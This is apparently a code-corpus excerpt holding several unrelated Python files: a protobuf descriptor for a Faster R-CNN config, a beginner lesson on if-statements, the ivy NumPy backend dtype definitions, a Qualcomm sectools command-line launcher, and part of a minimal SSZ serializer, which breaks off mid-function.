has_default_value=True, default_value=2,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='num_classes', full_name='object_detection.protos.FasterRcnn.num_classes', index=1,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image_resizer', full_name='object_detection.protos.FasterRcnn.image_resizer', index=2,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='feature_extractor', full_name='object_detection.protos.FasterRcnn.feature_extractor', index=3,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_anchor_generator', full_name='object_detection.protos.FasterRcnn.first_stage_anchor_generator', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_atrous_rate', full_name='object_detection.protos.FasterRcnn.first_stage_atrous_rate', index=5,
number=7, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_box_predictor_conv_hyperparams', full_name='object_detection.protos.FasterRcnn.first_stage_box_predictor_conv_hyperparams', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_box_predictor_kernel_size', full_name='object_detection.protos.FasterRcnn.first_stage_box_predictor_kernel_size', index=7,
number=9, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=3,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_box_predictor_depth', full_name='object_detection.protos.FasterRcnn.first_stage_box_predictor_depth', index=8,
number=10, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=512,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_minibatch_size', full_name='object_detection.protos.FasterRcnn.first_stage_minibatch_size', index=9,
number=11, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=256,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_positive_balance_fraction', full_name='object_detection.protos.FasterRcnn.first_stage_positive_balance_fraction', index=10,
number=12, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_nms_score_threshold', full_name='object_detection.protos.FasterRcnn.first_stage_nms_score_threshold', index=11,
number=13, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_nms_iou_threshold', full_name='object_detection.protos.FasterRcnn.first_stage_nms_iou_threshold', index=12,
number=14, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.7),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_max_proposals', full_name='object_detection.protos.FasterRcnn.first_stage_max_proposals', index=13,
number=15, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=300,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_localization_loss_weight', full_name='object_detection.protos.FasterRcnn.first_stage_localization_loss_weight', index=14,
number=16, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_objectness_loss_weight', full_name='object_detection.protos.FasterRcnn.first_stage_objectness_loss_weight', index=15,
number=17, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='initial_crop_size', full_name='object_detection.protos.FasterRcnn.initial_crop_size', index=16,
number=18, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxpool_kernel_size', full_name='object_detection.protos.FasterRcnn.maxpool_kernel_size', index=17,
number=19, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxpool_stride', full_name='object_detection.protos.FasterRcnn.maxpool_stride', index=18,
number=20, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_box_predictor', full_name='object_detection.protos.FasterRcnn.second_stage_box_predictor', index=19,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_batch_size', full_name='object_detection.protos.FasterRcnn.second_stage_batch_size', index=20,
number=22, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=64,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_balance_fraction', full_name='object_detection.protos.FasterRcnn.second_stage_balance_fraction', index=21,
number=23, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.25),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_post_processing', full_name='object_detection.protos.FasterRcnn.second_stage_post_processing', index=22,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_localization_loss_weight', full_name='object_detection.protos.FasterRcnn.second_stage_localization_loss_weight', index=23,
number=25, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_classification_loss_weight', full_name='object_detection.protos.FasterRcnn.second_stage_classification_loss_weight', index=24,
number=26, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_mask_prediction_loss_weight', full_name='object_detection.protos.FasterRcnn.second_stage_mask_prediction_loss_weight', index=25,
number=27, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hard_example_miner', full_name='object_detection.protos.FasterRcnn.hard_example_miner', index=26,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='second_stage_classification_loss', full_name='object_detection.protos.FasterRcnn.second_stage_classification_loss', index=27,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inplace_batchnorm_update', full_name='object_detection.protos.FasterRcnn.inplace_batchnorm_update', index=28,
number=30, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_matmul_crop_and_resize', full_name='object_detection.protos.FasterRcnn.use_matmul_crop_and_resize', index=29,
number=31, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='clip_anchors_to_image', full_name='object_detection.protos.FasterRcnn.clip_anchors_to_image', index=30,
number=32, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_matmul_gather_in_matcher', full_name='object_detection.protos.FasterRcnn.use_matmul_gather_in_matcher', index=31,
number=33, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_static_balanced_label_sampler', full_name='object_detection.protos.FasterRcnn.use_static_balanced_label_sampler', index=32,
number=34, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_static_shapes', full_name='object_detection.protos.FasterRcnn.use_static_shapes', index=33,
number=35, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='resize_masks', full_name='object_detection.protos.FasterRcnn.resize_masks', index=34,
number=36, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_static_shapes_for_eval', full_name='object_detection.protos.FasterRcnn.use_static_shapes_for_eval', index=35,
number=37, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_partitioned_nms_in_first_stage', full_name='object_detection.protos.FasterRcnn.use_partitioned_nms_in_first_stage', index=36,
number=38, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='return_raw_detections_during_predict', full_name='object_detection.protos.FasterRcnn.return_raw_detections_during_predict', index=37,
number=39, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_combined_nms_in_first_stage', full_name='object_detection.protos.FasterRcnn.use_combined_nms_in_first_stage', index=38,
number=40, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=337,
serialized_end=2262,
)
_FASTERRCNNFEATUREEXTRACTOR = _descriptor.Descriptor(
name='FasterRcnnFeatureExtractor',
full_name='object_detection.protos.FasterRcnnFeatureExtractor',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='object_detection.protos.FasterRcnnFeatureExtractor.type', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='first_stage_features_stride', full_name='object_detection.protos.FasterRcnnFeatureExtractor.first_stage_features_stride', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=16,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='batch_norm_trainable', full_name='object_detection.protos.FasterRcnnFeatureExtractor.batch_norm_trainable', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2264,
serialized_end=2384,
)
_FASTERRCNN.fields_by_name['image_resizer'].message_type = object__detection_dot_protos_dot_image__resizer__pb2._IMAGERESIZER
_FASTERRCNN.fields_by_name['feature_extractor'].message_type = _FASTERRCNNFEATUREEXTRACTOR
_FASTERRCNN.fields_by_name['first_stage_anchor_generator'].message_type = object__detection_dot_protos_dot_anchor__generator__pb2._ANCHORGENERATOR
_FASTERRCNN.fields_by_name['first_stage_box_predictor_conv_hyperparams'].message_type = object__detection_dot_protos_dot_hyperparams__pb2._HYPERPARAMS
_FASTERRCNN.fields_by_name['second_stage_box_predictor'].message_type = object__detection_dot_protos_dot_box__predictor__pb2._BOXPREDICTOR
_FASTERRCNN.fields_by_name['second_stage_post_processing'].message_type = object__detection_dot_protos_dot_post__processing__pb2._POSTPROCESSING
_FASTERRCNN.fields_by_name['hard_example_miner'].message_type = object__detection_dot_protos_dot_losses__pb2._HARDEXAMPLEMINER
_FASTERRCNN.fields_by_name['second_stage_classification_loss'].message_type = object__detection_dot_protos_dot_losses__pb2._CLASSIFICATIONLOSS
DESCRIPTOR.message_types_by_name['FasterRcnn'] = _FASTERRCNN
DESCRIPTOR.message_types_by_name['FasterRcnnFeatureExtractor'] = _FASTERRCNNFEATUREEXTRACTOR
FasterRcnn = _reflection.GeneratedProtocolMessageType('FasterRcnn', (_message.Message,), dict(
DESCRIPTOR = _FASTERRCNN,
__module__ = 'object_detection.protos.faster_rcnn_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.FasterRcnn)
))
_sym_db.RegisterMessage(FasterRcnn)
FasterRcnnFeatureExtractor = _reflection.GeneratedProtocolMessageType('FasterRcnnFeatureExtractor', (_message.Message,), dict(
DESCRIPTOR = _FASTERRCNNFEATUREEXTRACTOR,
__module__ = 'object_detection.protos.faster_rcnn_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.FasterRcnnFeatureExtractor)
))
_sym_db.RegisterMessage(FasterRcnnFeatureExtractor)
# @@protoc_insertion_point(module_scope)
| 60.514851 | 3,525 | 0.780023 |
ab33c48fcc05959299f6199a080330f336eb5098
| 917 |
py
|
Python
|
lec5.py
|
A-Glavin/ia241-github
|
c8371d2cdcceac0fa146b798caafc4d2db9c7e74
|
[
"MIT"
] | null | null | null |
lec5.py
|
A-Glavin/ia241-github
|
c8371d2cdcceac0fa146b798caafc4d2db9c7e74
|
[
"MIT"
] | null | null | null |
lec5.py
|
A-Glavin/ia241-github
|
c8371d2cdcceac0fa146b798caafc4d2db9c7e74
|
[
"MIT"
] | null | null | null |
'''
lec5 if statement
'''
import this
print( 2+
1)
print([1,2,3,
4,5,6])
m = 1+\
2
print(m)
a= [1,2,3]
b= [1,2,3,]
print(id([1, 2, 3]))
print(id(a))
print(id(b))
print(a is b)
print(a==b)
x = None
print(id(x))
print(id(None))
print(x is None)
print(x == None)
y = []
print(y == None)
print(y is None)
print( True and False )
print( True or False )
print(not True)
print(not False)
print(not None)
print(not '0')
print(() and [])
print([] and ())
print(-1 or 0)
print(0 or -1)
print(y == None)
print(y is None)
print( True and False)
print(not True)
print(not False)
print(not None)
print(not '0')
if 2>1 :
print('2>1')
if 3>1:
print('3>1')
if 2<1:
print('2<1')
print('not in the if block')
if 2<=1:
print('2<=1')
else:
print('2>2')
if 2<1:
print('2<1')
elif 2<=2:
print('2<=2')
else:
print('2>1')
| 10.54023 | 28 | 0.522356 |
68946bc037eb655c8a3a25dd801402047731c7cb
| 2,932 |
py
|
Python
|
ivy/functional/backends/numpy/__init__.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/__init__.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/__init__.py
|
RitujaPawas/ivy
|
595788507aca609e868cb3d17edd815463af28e4
|
[
"Apache-2.0"
] | null | null | null |
# global
import sys
import numpy as np
# local
import ivy
# noinspection PyUnresolvedReferences
use = ivy.backend_handler.ContextManager(sys.modules[__name__])
NativeArray = np.ndarray
NativeVariable = np.ndarray
NativeDevice = str
NativeDtype = np.dtype
# data types
int8 = ivy.IntDtype("int8")
int16 = ivy.IntDtype("int16")
int32 = ivy.IntDtype("int32")
int64 = ivy.IntDtype("int64")
uint8 = ivy.IntDtype("uint8")
uint16 = ivy.IntDtype("uint16")
uint32 = ivy.IntDtype("uint32")
uint64 = ivy.IntDtype("uint64")
bfloat16 = ivy.FloatDtype("bfloat16")
float16 = ivy.FloatDtype("float16")
float32 = ivy.FloatDtype("float32")
float64 = ivy.FloatDtype("float64")
# noinspection PyShadowingBuiltins
bool = "bool"
nan = float("nan")
inf = float("inf")
# native data types
native_int8 = np.dtype("int8")
native_int16 = np.dtype("int16")
native_int32 = np.dtype("int32")
native_int64 = np.dtype("int64")
native_uint8 = np.dtype("uint8")
native_uint16 = np.dtype("uint16")
native_uint32 = np.dtype("uint32")
native_uint64 = np.dtype("uint64")
native_float16 = np.dtype("float16")
native_float32 = np.dtype("float32")
native_float64 = np.dtype("float64")
# noinspection PyShadowingBuiltins
native_bool = np.dtype("bool")
valid_dtypes = (
int8,
int16,
int32,
int64,
uint8,
uint16,
uint32,
uint64,
float16,
float32,
float64,
bool,
)
valid_numeric_dtypes = (
int8,
int16,
int32,
int64,
uint8,
uint16,
uint32,
uint64,
float16,
float32,
float64,
)
valid_int_dtypes = (int8, int16, int32, int64, uint8, uint16, uint32, uint64)
valid_float_dtypes = (float16, float32, float64)
# invalid
invalid_dtypes = (bfloat16,)
invalid_numeric_dtypes = (bfloat16,)
invalid_int_dtypes = ()
invalid_float_dtypes = (bfloat16,)
def closest_valid_dtype(type):
if type is None:
return ivy.default_dtype()
type_str = ivy.as_ivy_dtype(type)
if type_str in invalid_dtypes:
return {"bfloat16": float16}[type_str]
return type
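# Example (illustrative): on this numpy backend bfloat16 is the only invalid
# float dtype, so it is mapped to the closest supported one:
#
#   closest_valid_dtype("bfloat16")  # -> float16
#   closest_valid_dtype(None)        # -> ivy.default_dtype()
#   closest_valid_dtype("float32")   # returned unchanged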
backend = "numpy"
# local sub-modules
from . import activations
from .activations import *
from . import compilation
from .compilation import *
from . import creation
from .creation import *
from . import data_type
from .data_type import *
from . import device
from .device import *
from . import elementwise
from .elementwise import *
from . import general
from .general import *
from . import gradients
from .gradients import *
from . import image
from .image import *
from . import layers
from .layers import *
from . import linear_algebra as linalg
from .linear_algebra import *
from . import manipulation
from .manipulation import *
from . import random
from .random import *
from . import searching
from .searching import *
from . import set
from .set import *
from . import sorting
from .sorting import *
from . import statistical
from .statistical import *
from . import utility
from .utility import *
| 21.718519 | 77 | 0.723738 |
d4dc12b31063b67d34473c2f2db4240f9785ddf0
| 8,198 |
py
|
Python
|
QCA4020_SDK/target/sectools/qdn/sectools.py
|
r8d8/lastlock
|
78c02e5fbb129b1bc4147bd55eec2882267d7e87
|
[
"Apache-2.0"
] | null | null | null |
QCA4020_SDK/target/sectools/qdn/sectools.py
|
r8d8/lastlock
|
78c02e5fbb129b1bc4147bd55eec2882267d7e87
|
[
"Apache-2.0"
] | null | null | null |
QCA4020_SDK/target/sectools/qdn/sectools.py
|
r8d8/lastlock
|
78c02e5fbb129b1bc4147bd55eec2882267d7e87
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
#
# Copyright (c) 2013-2018 Qualcomm Technologies, Inc.
# All Rights Reserved.
# Copyright (c) 2018 Qualcomm Technologies, Inc.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below)
# provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides a command line interface to the services provided by sectools
.. data:: SECTOOLS_TOOL_NAME
Name of the tool
.. data:: SECTOOLS_TOOL_VERSION
Version of the tool
"""
import os
import sys
import optparse
import traceback
from sectools import SECTOOLS_TOOL_NAME
from sectools import SECTOOLS_TOOL_VERSION
from sectools.common.utils.c_logging import logger
# List of features
FEATURES_LIST = []
sectools_features_package_name = "sectools.features"
sectools_features_path = os.path.join(
os.path.realpath(os.path.dirname(__file__)),
*(sectools_features_package_name.split(".")))
for module_name in os.listdir(sectools_features_path):
def import_features(module_path):
""" Import all features under the module path recursively.
:param module_path:
Python module path, such as sectools.features.isc.
It is already imported, and all its attributes are visible.
            The __init__.py file of a module to be imported may define
            either or both of two attributes: the singular __sectools_feature__,
and the plural __sectools_features__. The former is a string
referring to a potential feature Python module file, while the
latter is a list of strings referring to their respective
potential feature Python module files or packages. Again, they
are candidates. The logic implemented here determines whether
the feature candidate is actually imported as a sectools feature.
            If neither attribute is present, then no feature is imported.
"""
if hasattr(sys.modules[module_path], "__sectools_features__"):
for feature_package in getattr(
sys.modules[module_path], "__sectools_features__"):
feature_module_path = ".".join([module_path, feature_package])
try:
__import__(feature_module_path)
except ImportError:
continue
import_features(feature_module_path)
if hasattr(sys.modules[module_path], "__sectools_feature__"):
feature_name = getattr(sys.modules[module_path],
"__sectools_feature__")
__import__(".".join([module_path, feature_name]))
feature = getattr(sys.modules[module_path], feature_name)
FEATURES_LIST.append(feature)
if not os.path.isdir(os.path.join(sectools_features_path, module_name)):
continue
if hasattr(sectools_features_package_name, module_name):
continue
module_path = ".".join([sectools_features_package_name, module_name])
try:
__import__(module_path)
except ImportError:
continue
import_features(module_path)
if not FEATURES_LIST:
raise RuntimeError('Sectools could not find any packaged features')
__version__ = SECTOOLS_TOOL_NAME + ' ' + SECTOOLS_TOOL_VERSION
class SectoolsParser(optparse.OptionParser):
"""Parser for command line arguments supported by Sectools."""
def __init__(self):
# Initialize the base parser
optparse.OptionParser.__init__(self, usage=self.c_usage,
description=self.c_description,
version=self.c_version,
epilog=self.c_epilog)
self.c_add_options()
self.opt_args, self.pos_args = self.parse_args(args=sys.argv[:2])
if len(self.pos_args) == 1:
self.print_help(sys.stdout)
@property
def c_usage(self):
"""(str) Returns the usage of the program.
"""
return self.c_prog + ' [feature]'
@property
def c_prog(self):
"""(str) Returns the name of the program. By default this is the name
of the python file being executed.
"""
return os.path.basename(sys.argv[0])
@property
def c_description(self):
"""(str) Returns the description of the program."""
return 'This program provides an interface to the sectools features'
@property
def c_version(self):
"""(str) Returns the version of the program."""
return __version__
@property
def c_epilog(self):
"""(str) Returns the epilog for the program."""
feature_command_names = sorted(
[f.CMD_ARG_TOOL_NAME for f in FEATURES_LIST])
features = "\n".join(' %d. %s' % (idx, feature_name) for
idx, feature_name in
enumerate(feature_command_names, start=1))
example = self.c_prog + ' ' + feature_command_names[-1] + ' -h'
return """
Features available for sectools are:
{features}
Example usage:
{example}
""".format(features=features, example=example)
def format_epilog(self, formatter):
"""This method is implemented to override the OptionParser's formatting
of the epilog"""
return self.epilog
def c_add_options(self):
"""Adds the command line args supported by sectools."""
pass
def main(args):
"""Parses the command line arguments, performs any basic operations based on
the parsed arguments and starts processing using the isc module.
"""
# Print the tool's launch command
logger.debug2('\n\n Sectools launched as: "' + ' '.join(sys.argv) + '"\n')
if len(args) > 1:
feature = args[1]
for supported_feature in FEATURES_LIST:
if feature == supported_feature.CMD_ARG_TOOL_NAME:
supported_feature.main(supported_feature.parse_args(sys.argv[1:]))
break
else:
raise RuntimeError(
'Feature provided from command line: "' + feature + '" is invalid.' + '\n'
' ' + 'Please choose from : ' + str([f.CMD_ARG_TOOL_NAME for f in FEATURES_LIST]))
if __name__ == '__main__':
try:
        # Check that the command line arguments are valid and normalized.
args = SectoolsParser().pos_args
main(args)
except Exception:
logger.error(traceback.format_exc())
logger.error(sys.exc_info()[1])
sys.exit(1)
except KeyboardInterrupt:
        print('')
logger.error('Keyboard Interrupt Received. Exiting!')
sys.exit(1)
sys.exit(0)
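# Example invocations (the feature names are illustrative; the real names come
# from each feature's CMD_ARG_TOOL_NAME and are printed in the epilog when the
# tool runs without arguments):
#   python sectools.py                  # prints help and the list of features
#   python sectools.py <feature> -h     # prints the help of a single feature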
| 38.130233 | 149 | 0.664064 |
a4e74801f0e174743bf232e97dbdd268a0b10de0
| 6,422 |
py
|
Python
|
spec_pythonizer/minimal_ssz.py
|
hwwhww/research
|
4bde287aae017cd93fa936f587f21cddcc7c4129
|
[
"MIT"
] | 1 |
2020-07-22T14:50:53.000Z
|
2020-07-22T14:50:53.000Z
|
spec_pythonizer/minimal_ssz.py
|
hwwhww/research
|
4bde287aae017cd93fa936f587f21cddcc7c4129
|
[
"MIT"
] | null | null | null |
spec_pythonizer/minimal_ssz.py
|
hwwhww/research
|
4bde287aae017cd93fa936f587f21cddcc7c4129
|
[
"MIT"
] | null | null | null |
from hashlib import sha256
def hash(x): return sha256(x).digest()
BYTES_PER_CHUNK = 32
BYTES_PER_LENGTH_PREFIX = 4
ZERO_CHUNK = b'\x00' * BYTES_PER_CHUNK
def SSZType(fields):
class SSZObject():
def __init__(self, **kwargs):
for f in fields:
if f not in kwargs:
raise Exception("Missing constructor argument: %s" % f)
setattr(self, f, kwargs[f])
def __eq__(self, other):
return (
self.fields == other.fields and
self.serialize() == other.serialize()
)
def __hash__(self):
return int.from_bytes(self.hash_tree_root(), byteorder="little")
def __str__(self):
output = []
for field in self.fields:
output.append(f'{field}: {getattr(self, field)}')
return "\n".join(output)
def serialize(self):
return serialize(self, self.__class__)
def hash_tree_root(self):
return hash_tree_root(self, self.__class__)
SSZObject.fields = fields
return SSZObject
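# Minimal usage sketch (the field names are made up; the type strings follow
# the conventions accepted by serialize() and hash_tree_root() below):
#   Checkpoint = SSZType({'epoch': 'uint64', 'root': 'bytes32'})
#   cp = Checkpoint(epoch=5, root=b'\x11' * 32)
#   cp.serialize()         # -> bytes
#   cp.hash_tree_root()    # -> 32-byte root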
def is_basic(typ):
return isinstance(typ, str) and typ[:4] in ('uint', 'bool')
def is_constant_sized(typ):
if is_basic(typ):
return True
elif isinstance(typ, list) and len(typ) == 1:
return is_constant_sized(typ[0])
elif isinstance(typ, list) and len(typ) == 2:
return False
elif isinstance(typ, str) and typ[:5] == 'bytes':
return len(typ) > 5
elif hasattr(typ, 'fields'):
for subtype in typ.fields.values():
if not is_constant_sized(subtype):
return False
return True
else:
raise Exception("Type not recognized")
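# Type notation used throughout this module, as inferred from the checks above
# (a sketch, not an authoritative grammar):
#   'uint8' ... 'uint256', 'bool'   basic types
#   ['uint64']                      variable-length list of uint64
#   ['uint64', 4]                   fixed-length vector (element type, length)
#   'bytes'                         variable-length byte string
#   'bytes32'                       fixed-length byte string of 32 bytes
#   SSZType({...})                  container with named, typed fields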
def coerce_to_bytes(x):
if isinstance(x, str):
o = x.encode('utf-8')
assert len(o) == len(x)
return o
elif isinstance(x, bytes):
return x
else:
raise Exception("Expecting bytes")
def serialize(value, typ):
if isinstance(typ, str) and typ[:4] == 'uint':
length = int(typ[4:])
assert length in (8, 16, 32, 64, 128, 256)
        # The uint type name gives the size in bits; serialize little-endian.
        return value.to_bytes(length // 8, 'little')
elif typ == 'bool':
assert value in (True, False)
return b'\x01' if value is True else b'\x00'
elif (isinstance(typ, list) and len(typ) == 1) or typ == 'bytes':
serialized_bytes = coerce_to_bytes(value) if typ == 'bytes' else b''.join([serialize(element, typ[0]) for element in value])
assert len(serialized_bytes) < 2**(8 * BYTES_PER_LENGTH_PREFIX)
serialized_length = len(serialized_bytes).to_bytes(BYTES_PER_LENGTH_PREFIX, 'little')
return serialized_length + serialized_bytes
elif isinstance(typ, list) and len(typ) == 2:
        # Fixed-length vectors carry no length prefix; join the element encodings as bytes.
        return b''.join([serialize(element, typ[0]) for element in value])
elif isinstance(typ, str) and len(typ) > 5 and typ[:5] == 'bytes':
assert len(value) == int(typ[5:]), (value, int(typ[5:]))
return coerce_to_bytes(value)
elif hasattr(typ, 'fields'):
